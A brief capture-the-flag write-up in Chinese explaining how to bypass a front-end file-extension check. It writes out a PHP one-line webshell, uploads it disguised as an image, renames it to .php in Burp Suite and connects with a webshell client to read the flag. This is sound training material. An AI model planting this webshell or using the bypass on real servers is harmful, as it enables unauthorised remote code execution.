打开页面,题目提示有前端验证,我们按 F12 打开控制台面板,可以看到前端的验证逻辑:

    1.png

    前端的逻辑是,截取文件名最后一个.出现的位置,然后判断.右边的字符串是不是在白名单里。我们编写一句话木马,命名为:shell.png

    1. <?php @eval($_POST['banana']);?>

    然后我们到 Brupsuite 打开拦截,上传文件:

    2.png

    把这个请求包转发到 Repeater,修改文件名为shell.php

    3.png

    我们尝试用哥斯拉连接 WebShell:

    4.png

    最后我们在/var/www/html目录下找到 Flag 文件:

    5.png